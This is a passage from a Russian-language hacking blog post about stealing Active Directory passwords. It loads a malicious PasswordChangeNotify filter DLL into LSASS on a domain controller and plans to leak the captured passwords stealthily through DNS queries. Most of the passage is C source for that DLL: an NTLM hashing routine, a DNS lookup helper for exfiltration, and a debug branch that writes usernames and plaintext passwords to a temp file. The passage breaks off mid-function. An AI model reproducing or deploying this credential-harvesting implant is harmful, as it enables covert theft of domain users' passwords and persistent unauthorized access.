&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic7ZtfHEkfK60b2ZMWMzmyWAJKdVkbwuchPnaEZQp2K6qNmom8s2a_srYTOxHjGAntZZltVsd_8M2W-ndbiAjQCd1Si_aSnpOFTg62ZmbTeMbdN3llDYUYaktrnXAxrH3YJgw_qU1imI8/s1600/workstation_logon.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic7ZtfHEkfK60b2ZMWMzmyWAJKdVkbwuchPnaEZQp2K6qNmom8s2a_srYTOxHjGAntZZltVsd_8M2W-ndbiAjQCd1Si_aSnpOFTg62ZmbTeMbdN3llDYUYaktrnXAxrH3YJgw_qU1imI8/s1600/workstation_logon.jpg" height="376" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;В настоящие же дни, Microsoft, понимая, что с джиной хакерам не катит, предлагает использовать хук&amp;nbsp;&lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms721876%28v=vs.85%29.aspx" target="_blank"&gt;PasswordChangeNotify&lt;/a&gt;, который будучи подгруженный в LSASS на контроллере домена, позволяет собирать стабильный урожай в виде паролей пользователей домена. На эту функциональность собственно и обратил внимание &lt;a href="https://plus.google.com/u/0/112597020392561644851/posts" target="_blank"&gt;Rob Fuller&lt;/a&gt; aka &lt;a href="https://twitter.com/mubix" target="_blank"&gt;@mubix&lt;/a&gt;. Так появился &lt;a href="http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html" target="_blank"&gt;следующий пруф&lt;/a&gt;, который тут же был подхвачен сообществом [&lt;a href="http://www.phocean.net/2013/10/02/password-stealing-using-a-password-filter.html" target="_blank"&gt;тынц&lt;/a&gt;, &lt;a href="http://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" target="_blank"&gt;тынц&lt;/a&gt;].&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuVE0AIxKQFwrNpkDUtxEFjfCP4av0QFZgIMsiRwM_VnrQtmVRCkaHPcVNIx7tWRiZwD5wQTxPMRiedumhyphenhyphenBGcSUZGct9Ybs7lW6ZL9PO11zyghTlWrhKJmr1UajgIm6zwFBWHErEk7lk/s1600/CapturFiles.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuVE0AIxKQFwrNpkDUtxEFjfCP4av0QFZgIMsiRwM_VnrQtmVRCkaHPcVNIx7tWRiZwD5wQTxPMRiedumhyphenhyphenBGcSUZGct9Ybs7lW6ZL9PO11zyghTlWrhKJmr1UajgIm6zwFBWHErEk7lk/s1600/CapturFiles.png" height="348" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;В целом можно собрать &lt;a href="https://gist.github.com/mubix/6514311#file-evilpassfilter-cpp" target="_blank"&gt;код @mubix&lt;/a&gt; и использовать получившуюся dll'ль для различного рода благих целей. Но этот пруф не подходит для длительного плодотворного использования. Представляете, как удивится администратор адешечки, когда сетевой администратор покажет ему логи корпоративного прокси-сервера? Хотелось бы видеть мимику его лица, но в самом начале я уже говорил, что сегодня доводить до седины админов мы не станем.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Размышляя на тему того, как максимально эффективно можно воспользоваться наработками @mubix у меня появились следующие мысли:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;складировать пароли где-то в дебрях sysvol (отличное хранилище, но требует прав доменного пользователя и сетевого доступа к контроллеру домена при стягивании полезных данных)&lt;/li&gt;
&lt;li&gt;складировать пароли где-то в дебрях каталога ldap (аналогично недостаткам с sysvol)&lt;/li&gt;
&lt;li&gt;-//- где-то в dns-зоне домена (интересное решение, т.к. находятся такие умники, которые вывешивают внутренние dns-зоны в Ынтернет; с другой стороны весьма палевный способ)&lt;/li&gt;
&lt;li&gt;&lt;b&gt;тупо отдавать рекурсивно пароли по dns&lt;/b&gt; (…бинго!)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Кроме того, нам не нужны креды ВСЕХ пользователей домена, &lt;a href="http://devteev.blogspot.ru/2014/03/yep-another-backdoor-in-active.html" target="_blank"&gt;достаточно хешика krbtgt&lt;/a&gt; и 2-3 актуальных паролей админов, которым можно ходить на Citrix и/или VPN.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Так появился следующий код:&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;pre&gt;&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;winsock2.h&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;ws2tcpip.h&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;stdio.h&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;windows.h&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;pragma &lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;comment(lib, &lt;/span&gt;&lt;span style='color:#0000ff; font-weight:bold; '&gt;"ws2_32.lib"&lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;)&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;ntsecapi.h&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;&lt;span style='color:#000084; '&gt; &lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;string&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;include &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&amp;lt;&lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;algorithm&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;&gt;&lt;/span&gt;
&lt;span style='color:#000084; font-weight:bold; '&gt;using&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;namespace&lt;/span&gt; std;

&lt;span style='color:#808080; '&gt;//**********************************************&lt;/span&gt;
&lt;span style='color:#808080; '&gt;//Init values&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;define&lt;/span&gt;&lt;span style='color:#000084; '&gt; INIT_A 0x67452301&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;define&lt;/span&gt;&lt;span style='color:#000084; '&gt; INIT_B 0xefcdab89&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;define&lt;/span&gt;&lt;span style='color:#000084; '&gt; INIT_C 0x98badcfe&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;define&lt;/span&gt;&lt;span style='color:#000084; '&gt; INIT_D 0x10325476&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;define&lt;/span&gt;&lt;span style='color:#000084; '&gt; SQRT_2 0x5a827999&lt;/span&gt;
&lt;span style='color:#000084; '&gt;#&lt;/span&gt;&lt;span style='color:#000084; '&gt;define&lt;/span&gt;&lt;span style='color:#000084; '&gt; SQRT_3 0x6ed9eba1&lt;/span&gt;

&lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; nt_buffer[16];
&lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; output[4];
&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; itoa16[17] = &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;0123456789ABCDEF&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;;

&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; ntlmhash[33];
&lt;span style='color:#808080; '&gt;//**********************************************&lt;/span&gt;

&lt;span style='color:#808080; '&gt;// &lt;/span&gt;&lt;span style='color:#3f3fbf; '&gt;http://www.codeproject.com/Articles/328761/NTLM-Hash-Generator&lt;/span&gt;
&lt;span style='color:#000084; font-weight:bold; '&gt;void&lt;/span&gt; NTLM(&lt;span style='color:#000084; font-weight:bold; '&gt;PWSTR&lt;/span&gt; key, &lt;span style='color:#000084; font-weight:bold; '&gt;USHORT&lt;/span&gt; sizekey)
{
    &lt;span style='color:#808080; '&gt;//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
    &lt;span style='color:#808080; '&gt;// Prepare the string for hash calculation&lt;/span&gt;
    &lt;span style='color:#808080; '&gt;//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
    &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; i = 0;
 &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; length = sizekey;
    &lt;span style='color:#000084; font-weight:bold; '&gt;memset&lt;/span&gt;(nt_buffer, 0, 16*4);
    &lt;span style='color:#808080; '&gt;//The length of key need to be &amp;lt;= 27&lt;/span&gt;
    &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt;(; i&amp;lt;length/2; i++)   
        nt_buffer[i] = key[2 * i] | (key[2 * i + 1] &amp;lt;&amp;lt; 16);
  
    &lt;span style='color:#808080; '&gt;//padding&lt;/span&gt;
    &lt;span style='color:#000084; font-weight:bold; '&gt;if&lt;/span&gt;(length % 2 == 1)
        nt_buffer[i] = key[length - 1] | 0x800000;
    &lt;span style='color:#000084; font-weight:bold; '&gt;else&lt;/span&gt;
        nt_buffer[i] = 0x80;
    &lt;span style='color:#808080; '&gt;//put the length&lt;/span&gt;
    nt_buffer[14] = length &amp;lt;&amp;lt; 4;
    &lt;span style='color:#808080; '&gt;//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
    &lt;span style='color:#808080; '&gt;// NTLM hash calculation&lt;/span&gt;
    &lt;span style='color:#808080; '&gt;//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
    &lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; a = INIT_A;
    &lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; b = INIT_B;
    &lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; c = INIT_C;
    &lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; d = INIT_D;
  
    &lt;span style='color:#808080; '&gt;/* Round 1 */&lt;/span&gt;
    a += (d ^ (b &amp;amp; (c ^ d)))  +  nt_buffer[0]  ;a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ (a &amp;amp; (b ^ c)))  +  nt_buffer[1]  ;d = (d &amp;lt;&amp;lt; 7 ) | (d &gt;&gt; 25);
    c += (b ^ (d &amp;amp; (a ^ b)))  +  nt_buffer[2]  ;c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ (c &amp;amp; (d ^ a)))  +  nt_buffer[3]  ;b = (b &amp;lt;&amp;lt; 19) | (b &gt;&gt; 13);
  
    a += (d ^ (b &amp;amp; (c ^ d)))  +  nt_buffer[4]  ;a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ (a &amp;amp; (b ^ c)))  +  nt_buffer[5]  ;d = (d &amp;lt;&amp;lt; 7 ) | (d &gt;&gt; 25);
    c += (b ^ (d &amp;amp; (a ^ b)))  +  nt_buffer[6]  ;c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ (c &amp;amp; (d ^ a)))  +  nt_buffer[7]  ;b = (b &amp;lt;&amp;lt; 19) | (b &gt;&gt; 13);
  
    a += (d ^ (b &amp;amp; (c ^ d)))  +  nt_buffer[8]  ;a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ (a &amp;amp; (b ^ c)))  +  nt_buffer[9]  ;d = (d &amp;lt;&amp;lt; 7 ) | (d &gt;&gt; 25);
    c += (b ^ (d &amp;amp; (a ^ b)))  +  nt_buffer[10] ;c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ (c &amp;amp; (d ^ a)))  +  nt_buffer[11] ;b = (b &amp;lt;&amp;lt; 19) | (b &gt;&gt; 13);
  
    a += (d ^ (b &amp;amp; (c ^ d)))  +  nt_buffer[12] ;a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ (a &amp;amp; (b ^ c)))  +  nt_buffer[13] ;d = (d &amp;lt;&amp;lt; 7 ) | (d &gt;&gt; 25);
    c += (b ^ (d &amp;amp; (a ^ b)))  +  nt_buffer[14] ;c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ (c &amp;amp; (d ^ a)))  +  nt_buffer[15] ;b = (b &amp;lt;&amp;lt; 19) | (b &gt;&gt; 13);
  
    &lt;span style='color:#808080; '&gt;/* Round 2 */&lt;/span&gt;
    a += ((b &amp;amp; (c | d)) | (c &amp;amp; d)) + nt_buffer[0] +SQRT_2; a = (a&amp;lt;&amp;lt;3 ) | (a&gt;&gt;29);
    d += ((a &amp;amp; (b | c)) | (b &amp;amp; c)) + nt_buffer[4] +SQRT_2; d = (d&amp;lt;&amp;lt;5 ) | (d&gt;&gt;27);
    c += ((d &amp;amp; (a | b)) | (a &amp;amp; b)) + nt_buffer[8] +SQRT_2; c = (c&amp;lt;&amp;lt;9 ) | (c&gt;&gt;23);
    b += ((c &amp;amp; (d | a)) | (d &amp;amp; a)) + nt_buffer[12]+SQRT_2; b = (b&amp;lt;&amp;lt;13) | (b&gt;&gt;19);
  
    a += ((b &amp;amp; (c | d)) | (c &amp;amp; d)) + nt_buffer[1] +SQRT_2; a = (a&amp;lt;&amp;lt;3 ) | (a&gt;&gt;29);
    d += ((a &amp;amp; (b | c)) | (b &amp;amp; c)) + nt_buffer[5] +SQRT_2; d = (d&amp;lt;&amp;lt;5 ) | (d&gt;&gt;27);
    c += ((d &amp;amp; (a | b)) | (a &amp;amp; b)) + nt_buffer[9] +SQRT_2; c = (c&amp;lt;&amp;lt;9 ) | (c&gt;&gt;23);
    b += ((c &amp;amp; (d | a)) | (d &amp;amp; a)) + nt_buffer[13]+SQRT_2; b = (b&amp;lt;&amp;lt;13) | (b&gt;&gt;19);
  
    a += ((b &amp;amp; (c | d)) | (c &amp;amp; d)) + nt_buffer[2] +SQRT_2; a = (a&amp;lt;&amp;lt;3 ) | (a&gt;&gt;29);
    d += ((a &amp;amp; (b | c)) | (b &amp;amp; c)) + nt_buffer[6] +SQRT_2; d = (d&amp;lt;&amp;lt;5 ) | (d&gt;&gt;27);
    c += ((d &amp;amp; (a | b)) | (a &amp;amp; b)) + nt_buffer[10]+SQRT_2; c = (c&amp;lt;&amp;lt;9 ) | (c&gt;&gt;23);
    b += ((c &amp;amp; (d | a)) | (d &amp;amp; a)) + nt_buffer[14]+SQRT_2; b = (b&amp;lt;&amp;lt;13) | (b&gt;&gt;19);
  
    a += ((b &amp;amp; (c | d)) | (c &amp;amp; d)) + nt_buffer[3] +SQRT_2; a = (a&amp;lt;&amp;lt;3 ) | (a&gt;&gt;29);
    d += ((a &amp;amp; (b | c)) | (b &amp;amp; c)) + nt_buffer[7] +SQRT_2; d = (d&amp;lt;&amp;lt;5 ) | (d&gt;&gt;27);
    c += ((d &amp;amp; (a | b)) | (a &amp;amp; b)) + nt_buffer[11]+SQRT_2; c = (c&amp;lt;&amp;lt;9 ) | (c&gt;&gt;23);
    b += ((c &amp;amp; (d | a)) | (d &amp;amp; a)) + nt_buffer[15]+SQRT_2; b = (b&amp;lt;&amp;lt;13) | (b&gt;&gt;19);
  
    &lt;span style='color:#808080; '&gt;/* Round 3 */&lt;/span&gt;
    a += (d ^ c ^ b) + nt_buffer[0]  +  SQRT_3; a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ b ^ a) + nt_buffer[8]  +  SQRT_3; d = (d &amp;lt;&amp;lt; 9 ) | (d &gt;&gt; 23);
    c += (b ^ a ^ d) + nt_buffer[4]  +  SQRT_3; c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ d ^ c) + nt_buffer[12] +  SQRT_3; b = (b &amp;lt;&amp;lt; 15) | (b &gt;&gt; 17);
  
    a += (d ^ c ^ b) + nt_buffer[2]  +  SQRT_3; a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ b ^ a) + nt_buffer[10] +  SQRT_3; d = (d &amp;lt;&amp;lt; 9 ) | (d &gt;&gt; 23);
    c += (b ^ a ^ d) + nt_buffer[6]  +  SQRT_3; c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ d ^ c) + nt_buffer[14] +  SQRT_3; b = (b &amp;lt;&amp;lt; 15) | (b &gt;&gt; 17);
  
    a += (d ^ c ^ b) + nt_buffer[1]  +  SQRT_3; a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ b ^ a) + nt_buffer[9]  +  SQRT_3; d = (d &amp;lt;&amp;lt; 9 ) | (d &gt;&gt; 23);
    c += (b ^ a ^ d) + nt_buffer[5]  +  SQRT_3; c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ d ^ c) + nt_buffer[13] +  SQRT_3; b = (b &amp;lt;&amp;lt; 15) | (b &gt;&gt; 17);
  
    a += (d ^ c ^ b) + nt_buffer[3]  +  SQRT_3; a = (a &amp;lt;&amp;lt; 3 ) | (a &gt;&gt; 29);
    d += (c ^ b ^ a) + nt_buffer[11] +  SQRT_3; d = (d &amp;lt;&amp;lt; 9 ) | (d &gt;&gt; 23);
    c += (b ^ a ^ d) + nt_buffer[7]  +  SQRT_3; c = (c &amp;lt;&amp;lt; 11) | (c &gt;&gt; 21);
    b += (a ^ d ^ c) + nt_buffer[15] +  SQRT_3; b = (b &amp;lt;&amp;lt; 15) | (b &gt;&gt; 17);
  
    output[0] = a + INIT_A;
    output[1] = b + INIT_B;
    output[2] = c + INIT_C;
    output[3] = d + INIT_D;
    &lt;span style='color:#808080; '&gt;//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
    &lt;span style='color:#808080; '&gt;// Convert the hash to hex (for being readable)&lt;/span&gt;
    &lt;span style='color:#808080; '&gt;//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
    &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt;(i=0; i&amp;lt;4; i++)
    {
        &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; j = 0;
        &lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; n = output[i];
        &lt;span style='color:#808080; '&gt;//iterate the bytes of the integer      &lt;/span&gt;
        &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt;(; j&amp;lt;4; j++)
        {
            &lt;span style='color:#000084; font-weight:bold; '&gt;unsigned&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; convert = n % 256;
            ntlmhash[i * 8 + j * 2 + 1] = itoa16[convert % 16];
            convert = convert / 16;
            ntlmhash[i * 8 + j * 2 + 0] = itoa16[convert % 16];
            n = n / 256;
        }   
    }
    &lt;span style='color:#808080; '&gt;//null terminate the string&lt;/span&gt;
    ntlmhash[33] = 0;
}
&lt;span style='color:#808080; '&gt;//**********************************************&lt;/span&gt;

&lt;span style='color:#000084; font-weight:bold; '&gt;void&lt;/span&gt; nsping(&lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; * host)
{

    WSADATA wsaData;
    &lt;span style='color:#000084; font-weight:bold; '&gt;int&lt;/span&gt; iResult;

    &lt;span style='color:#000084; font-weight:bold; '&gt;struct&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;hostent&lt;/span&gt; *remoteHost;
    &lt;span style='color:#000084; font-weight:bold; '&gt;char&lt;/span&gt; *host_name;

    &lt;span style='color:#808080; '&gt;// Initialize Winsock&lt;/span&gt;
    iResult = &lt;span style='color:#000084; font-weight:bold; '&gt;WSAStartup&lt;/span&gt;(&lt;span style='color:#000084; font-weight:bold; '&gt;MAKEWORD&lt;/span&gt;(2, 2), &amp;amp;wsaData);
    &lt;span style='color:#000084; font-weight:bold; '&gt;if&lt;/span&gt; (iResult == 0) {
  host_name = host;
  remoteHost = &lt;span style='color:#000084; font-weight:bold; '&gt;gethostbyname&lt;/span&gt;(host_name);
    }
}

&lt;span style='color:#808080; '&gt;// Default DllMain implementation&lt;/span&gt;
&lt;span style='color:#000084; font-weight:bold; '&gt;BOOL&lt;/span&gt; APIENTRY DllMain( &lt;span style='color:#000084; font-weight:bold; '&gt;HANDLE&lt;/span&gt; hModule, 
                       &lt;span style='color:#000084; font-weight:bold; '&gt;DWORD&lt;/span&gt;  ul_reason_for_call, 
                       &lt;span style='color:#000084; font-weight:bold; '&gt;LPVOID&lt;/span&gt; lpReserved
                     )
{
    &lt;span style='color:#000084; font-weight:bold; '&gt;switch&lt;/span&gt; (ul_reason_for_call)
    {
        &lt;span style='color:#000084; font-weight:bold; '&gt;case &lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;DLL_PROCESS_ATTACH&lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;:&lt;/span&gt;
        &lt;span style='color:#000084; font-weight:bold; '&gt;case &lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;DLL_THREAD_ATTACH&lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;:&lt;/span&gt;
        &lt;span style='color:#000084; font-weight:bold; '&gt;case &lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;DLL_THREAD_DETACH&lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;:&lt;/span&gt;
        &lt;span style='color:#000084; font-weight:bold; '&gt;case &lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;DLL_PROCESS_DETACH&lt;/span&gt;&lt;span style='color:#000084; font-weight:bold; '&gt;:&lt;/span&gt;
            &lt;span style='color:#000084; font-weight:bold; '&gt;break&lt;/span&gt;;
    }
    &lt;span style='color:#000084; font-weight:bold; '&gt;return&lt;/span&gt; TRUE;
}
 
&lt;span style='color:#000084; font-weight:bold; '&gt;BOOLEAN&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;__stdcall&lt;/span&gt; InitializeChangeNotify(&lt;span style='color:#000084; font-weight:bold; '&gt;void&lt;/span&gt;)
{
    &lt;span style='color:#000084; font-weight:bold; '&gt;return&lt;/span&gt; TRUE;
}
 
&lt;span style='color:#000084; font-weight:bold; '&gt;BOOLEAN&lt;/span&gt; &lt;span style='color:#000084; font-weight:bold; '&gt;__stdcall&lt;/span&gt; PasswordFilter(
    PUNICODE_STRING AccountName,
    PUNICODE_STRING FullName,
    PUNICODE_STRING Password,
    &lt;span style='color:#000084; font-weight:bold; '&gt;BOOLEAN&lt;/span&gt; SetOperation )
{
    &lt;span style='color:#000084; font-weight:bold; '&gt;return&lt;/span&gt; TRUE;
}
 
NTSTATUS &lt;span style='color:#000084; font-weight:bold; '&gt;__stdcall&lt;/span&gt; PasswordChangeNotify(
    PUNICODE_STRING UserName,
    &lt;span style='color:#000084; font-weight:bold; '&gt;ULONG&lt;/span&gt; RelativeId,
    PUNICODE_STRING NewPassword )
{

  boolean debug = FALSE;

  &lt;span style='color:#000084; font-weight:bold; '&gt;if&lt;/span&gt; (debug)
  {
 &lt;span style='color:#000084; font-weight:bold; '&gt;FILE&lt;/span&gt;* pFile = &lt;span style='color:#000084; font-weight:bold; '&gt;fopen&lt;/span&gt;(&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;c:&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\\&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;windows&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\\&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;temp&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\\&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;pw.tmp&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;, &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;a+&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;);
 &lt;span style='color:#000084; font-weight:bold; '&gt;if&lt;/span&gt; (&lt;span style='color:#000084; font-weight:bold; '&gt;NULL&lt;/span&gt; != pFile)
 {
   &lt;span style='color:#000084; font-weight:bold; '&gt;fprintf&lt;/span&gt;(pFile, &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\r&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\n&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;User: %ws&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;, UserName-&gt;Buffer);
   &lt;span style='color:#000084; font-weight:bold; '&gt;fprintf&lt;/span&gt;(pFile, &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\r&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\n&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;Password: %ws&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;, NewPassword-&gt;Buffer);
   &lt;span style='color:#000084; font-weight:bold; '&gt;fprintf&lt;/span&gt;(pFile, &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\r&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;\n&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;Hex: &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;);

   &lt;span style='color:#000084; font-weight:bold; '&gt;for&lt;/span&gt; (&lt;span style='color:#000084; font-weight:bold; '&gt;USHORT&lt;/span&gt; i = 0; i &amp;lt; (NewPassword-&gt;Length / 2); i++) 
   {
  &lt;span style='color:#000084; font-weight:bold; '&gt;fprintf&lt;/span&gt;(pFile, &lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;&lt;span style='color:#0000ff; '&gt;%x&lt;/span&gt;&lt;span style='color:#0000ff; '&gt; &lt;/span&gt;&lt;span style='color:#0000ff; '&gt;"&lt;/span&gt;,NewPassword-&gt;Buffer[i]);
   }
   &lt;span style='color:#000084; font-weight:bold; '&gt;fclose&lt;/span&gt;(pFile);
 }
  }

